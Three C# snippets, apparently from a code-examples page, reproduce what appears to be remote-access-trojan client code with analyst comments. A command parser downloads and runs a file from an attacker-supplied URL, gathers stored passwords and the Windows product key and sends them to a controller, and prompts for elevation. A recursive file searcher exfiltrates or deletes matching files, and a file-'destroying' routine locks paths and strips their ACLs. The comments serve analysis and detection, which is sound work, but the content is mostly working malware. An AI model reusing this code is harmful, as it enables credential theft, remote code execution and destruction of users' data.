Beispiel #1
 /// <summary>
 /// Makes the file at <paramref name="path"/> unusable in place without deleting its content:
 /// the file is moved into the temp directory, an empty file is written at the original path,
 /// that placeholder is opened with a read/write share lock, and an access-control object with
 /// inheritance protection switched on is applied to the path.
 /// </summary>
 /// <remarks>
 /// Analyst notes. The log prefix is "[Anti Malware]", but nothing in this method inspects what
 /// the file is; any existing path handed in is treated the same way. The original bytes are
 /// moved, not wiped, so they stay recoverable from the temp directory under a purely numeric
 /// file name. Every exception is swallowed, so callers and logs cannot be relied on to show
 /// whether the steps actually completed.
 /// </remarks>
 /// <param name="path">Path of the file to act on; nothing happens if it does not exist.</param>
 private void DestroyFile(string path)
 {
     try
     {
         if (System.IO.File.Exists(path))
         {
             // Only used to pick the numeric temp file name below.
             Random r = new Random();
             try
             {
                 // Move (not delete) the original to <temp><number>, number in 500..8999
                 // (upper bound of Next is exclusive). GetTempPath() ends with a separator,
                 // so plain concatenation yields a file directly inside the temp directory.
                 // If that name already exists File.Move throws and the fallback below runs.
                 File.Move(path, System.IO.Path.GetTempPath() + r.Next(500, 9000));
                 // Recreate the original path as a zero-length placeholder.
                 System.IO.File.WriteAllText(path, string.Empty);
                 // NOTE(review): FileSystem/OpenMode/OpenShare look like the Visual Basic runtime
                 // file API. The file number is not stored and no close call is visible here,
                 // so the LockReadWrite handle presumably stays open until the process exits.
                 FileSystem.FileOpen(FileSystem.FreeFile(), path, OpenMode.Input, OpenAccess.Default, OpenShare.LockReadWrite);
                 // A DirectoryInfo is built on what File.Exists just confirmed is a file path.
                 System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(path);
                 // No access rules are added to this object anywhere in the method.
                 DirectorySecurity       FolderAcl  = new DirectorySecurity();
                 // isProtected = true, preserveInheritance = false: inheritance is cut and
                 // inherited rules are dropped rather than copied.
                 // NOTE(review): presumably leaves the path with an ACL that grants nobody
                 // access -- confirm on the target OS; an owner or administrator can reset it.
                 FolderAcl.SetAccessRuleProtection(true, false);
                 FolderInfo.SetAccessControl(FolderAcl);
                 mwork.addlog("[Anti Malware] Destroyed File at: " + path);
                 // Counter field declared outside this block.
                 fileskilled = fileskilled + 1;
             }
             catch
             {
                 // Bare catch: any failure above lands here, including one that happens after
                 // the move already succeeded. The exception itself is not recorded.
                 mwork.adderror("[Anti Malware] Error while destroying File!");
                 mwork.adderror("[Anti Malware] Executing minimal destroy File Function..");
                 // Fallback repeats only the ACL step; no move, no placeholder, no lock.
                 System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(path);
                 DirectorySecurity       FolderAcl  = new DirectorySecurity();
                 FolderAcl.SetAccessRuleProtection(true, false);
                 FolderInfo.SetAccessControl(FolderAcl);
                 mwork.addlog("[Anti Malware] Destroyed (low) File at: " + path);
                 // The fallback counts as a success in the same counter as the full path.
                 fileskilled = fileskilled + 1;
             }
         }
     }
     catch
     {
         // Swallows everything, including a failure of the fallback above; in that case only
         // the two adderror lines remain as a trace.
     }
 }
Beispiel #2
        /// <summary>
        /// Walks <paramref name="vPath"/> and all of its subdirectories and, for every file whose
        /// path contains <paramref name="filename"/>, performs the operation named by the
        /// <c>action</c> member ("Download", "Delete" or "Block and Destroy").
        /// </summary>
        /// <remarks>
        /// Analyst notes. <c>action</c>, <c>taskid</c>, <c>fm3</c> and <c>mwork</c> are declared
        /// outside this block. The match is a case-sensitive substring test against the full path
        /// returned by GetFiles, so a directory whose name contains the search string matches
        /// every file inside it. The literal log and message prefixes below ("File Searcher
        /// [TaskID", "fmXdlfile|") are stable strings that can be used when hunting for this code.
        /// </remarks>
        /// <param name="vPath">Directory to start from.</param>
        /// <param name="filename">Substring looked for in each file's full path.</param>
        private void WalkDirRecursive(string vPath, string filename)
        {
            try
            {
                System.IO.DirectoryInfo vDirInfo = new System.IO.DirectoryInfo(vPath);

                foreach (string fname in System.IO.Directory.GetFiles(vDirInfo.FullName))
                {
                    // fname is a full path, so this also matches on directory names.
                    if (fname.Contains(filename))
                    {
                        // This check only gates the log line; the action branches below sit
                        // outside it.
                        if (!fname.Contains(Application.StartupPath))
                        {
                            mwork.addlog("File Searcher [TaskID " + taskid + "] Found File at: " + fname);
                        }
                        if (action.Equals("Download"))
                        {
                            // NOTE(review): fm3.dlFile is not visible here; its string result is
                            // forwarded through mwork.Send, so this presumably sends the file (or
                            // a reference to it) off the host -- confirm against fm3.dlFile.
                            string sendback = fm3.dlFile(fname);
                            // Pipe-delimited message: tag, dlFile result, file name, client id, origin label.
                            mwork.Send("fmXdlfile|" + sendback + "|" + Path.GetFileName(fname) + "|" + mwork.ClientID + "|" + "File Searcher");
                        }
                        else if (action.Equals("Delete"))
                        {
                            try
                            {
                                File.Delete(fname);
                                mwork.addinfo("File Searcher [TaskID " + taskid + "] Deleted File: " + fname);
                            }
                            catch
                            {
                                // The failure reason is discarded; only the path is reported.
                                mwork.adderror("File Searcher [TaskID " + taskid + "] Couldnt delete File: " + fname);
                            }
                        }
                        else if (action.Equals("Block and Destroy"))
                        {
                            // FileManager.blockfile is defined elsewhere; its effect is not
                            // visible from this block.
                            FileManager fmgrr = new FileManager();
                            fmgrr.blockfile(fname);
                            mwork.addinfo("File Searcher [TaskID " + taskid + "] Blocked and Destroyed File: " + fname);
                        }
                    }
                }

                // Depth-first descent with no depth limit visible in this block.
                foreach (string vSubDir in System.IO.Directory.GetDirectories(vDirInfo.FullName))
                {
                    WalkDirRecursive(vSubDir, filename);
                }
            }
            // Any exception ends the walk of this directory and everything below it without a
            // log entry. The caller's loop continues with the next sibling, because the
            // exception is caught inside the recursive call.
            catch { }
        }
Beispiel #3
        /// <summary>
        /// Parses a batch of remotely supplied commands and runs each one. Commands are separated
        /// by '³'; the fields inside a command are separated by '²'. Field 0 selects the command
        /// family ("execute", "Recover", "uac", "antim", "action"), field 1 the sub-command, and
        /// fields 2 and 3 carry arguments where a sub-command uses them.
        /// </summary>
        /// <remarks>
        /// Analyst notes. No field is validated before use: a command with too few fields throws
        /// inside the loop, the single outer catch reports it through <c>mwrk.adderror</c>, and
        /// the rest of the batch is not processed. The "execute" family downloads a file from a
        /// URL taken from the command and starts it with no integrity or origin check visible
        /// here. The "Recover" family sends collected secrets back through <c>mwrk.Send</c>. The
        /// delimiters, the status strings and the "passreco|" / "winserial|" prefixes are stable
        /// literals that can be used for detection. <c>mwrk</c> is declared outside this block.
        /// </remarks>
        /// <param name="commands">Raw command batch in the delimiter format described above.</param>
        public void Start(string commands)
        {
            try
            {
                string[] cmds = commands.Split('³');

                foreach (string cmd in cmds)
                {
                    // The command is re-split on every field access; the case labels are
                    // matched case-sensitively.
                    switch (cmd.Split('²')[0])
                    {
                    case "execute":
                        if (cmd.Split('²')[1].Equals("file"))
                        {
                            // Both values come straight from the command string.
                            string url            = cmd.Split('²')[2];
                            string dropAs         = cmd.Split('²')[3];
                            string fullPathString = Path.GetTempPath();

                            mwrk.SendStatus("Downloading File...");
                            WebClient webClienta = new WebClient();
                            // Download into the temp directory, then start the result. Observable
                            // as a network fetch followed by a child process whose image lives
                            // under the temp path.
                            webClienta.DownloadFile(url, fullPathString + @"\" + dropAs);
                            Process.Start(fullPathString + @"\" + dropAs);
                            mwrk.SendStatus("Executed File!");
                        }
                        else if (cmd.Split('²')[1].Equals("update"))
                        {
                            string dllink      = cmd.Split('²')[2];
                            string saveas      = cmd.Split('²')[3];
                            string currentPath = Application.StartupPath;
                            mwrk.SendStatus("Downloading Update...");
                            WebClient webClient = new WebClient();
                            // Same download-and-start pattern, written next to the running
                            // program instead of into the temp directory.
                            webClient.DownloadFile(dllink, currentPath + @"\" + saveas);
                            Process.Start(currentPath + @"\" + saveas);
                            mwrk.SendStatus("Executed Update! Disconnecting...");
                            // Short pause, then the current instance removes itself.
                            // NOTE(review): what Uninstall removes is not visible here.
                            Thread.Sleep(400);
                            mwrk.Uninstall();
                        }
                        break;

                    case "Recover":
                        // Both objects are created for every "Recover" command; rec is not used
                        // again in the visible code.
                        WinSerial wins = new WinSerial();
                        Recovery  rec  = new Recovery();

                        if (cmd.Split('²')[1].Equals("Passwords"))
                        {
                            foreach (DriveInfo Drive in DriveInfo.GetDrives())
                            {
                                // Only the drive whose root is exactly C:\ is processed.
                                if (Drive.RootDirectory.FullName == @"C:\")
                                {
                                    Recovery x = new Recovery(Drive);

                                    // NOTE(review): Recovery is defined elsewhere; from the names
                                    // this presumably collects stored passwords into allPws, which
                                    // is then sent off the host together with the client id.
                                    x.recoverAll();
                                    mwrk.Send("passreco|" + mwrk.ClientID + "|" + x.allPws);
                                }
                            }
                        }
                        else if (cmd.Split('²')[1].Equals("Winserial"))
                        {
                            // Going by the method name, reads the Windows product key from the
                            // registry; the value is sent with the client id and OS string.
                            string serial = wins.GetWindowsProductKeyFromRegistry();
                            mwrk.Send("winserial|" + mwrk.ClientID + "|" + mwrk.OperatingSystem + "|" + serial);
                        }

                        break;

                    case "uac":
                        if (cmd.Split('²')[1].Equals("request"))
                        {
                            // Runs mwrk.askUac on a background thread.
                            // NOTE(review): presumably triggers an elevation prompt; askUac and
                            // the meaning of "nonpersist" are not visible here.
                            mwrk.Uacmode = "nonpersist";
                            Thread yellowUacThread = new Thread(mwrk.askUac);
                            yellowUacThread.IsBackground = true;
                            yellowUacThread.Start();
                        }
                        break;

                    case "antim":
                        if (cmd.Split('²')[1].Equals("normal"))
                        {
                            // Meaning of the "#" argument is defined by StartAntiMalwareThread,
                            // which is outside this block.
                            mwrk.StartAntiMalwareThread("#");
                        }
                        else if (cmd.Split('²')[1].Equals("enableprs"))
                        {
                            // Sets the flag, then starts mwrk.proactiveAM on a background thread.
                            mwrk.proActiveIsEnabled = true;
                            Thread tPR = new Thread(new ThreadStart(mwrk.proactiveAM));
                            tPR.IsBackground = true;
                            tPR.Start();
                        }
                        else if (cmd.Split('²')[1].Equals("disableprs"))
                        {
                            // Only clears the flag; the thread is not stopped from here, so
                            // proactiveAM presumably polls it -- confirm.
                            mwrk.proActiveIsEnabled = false;
                        }
                        break;

                    case "action":
                        if (cmd.Split('²')[1].Equals("disconnect"))
                        {
                            // Ends the whole process immediately; later commands in the batch
                            // never run.
                            Environment.Exit(0);
                        }
                        else if (cmd.Split('²')[1].Equals("uninstall"))
                        {
                            mwrk.Uninstall();
                        }
                        break;
                    }
                }
            }
            // One handler for the whole batch: the first exception from any command stops the
            // loop and is reported as text through mwrk.adderror.
            catch (Exception eax) { mwrk.adderror(eax.ToString()); }
        }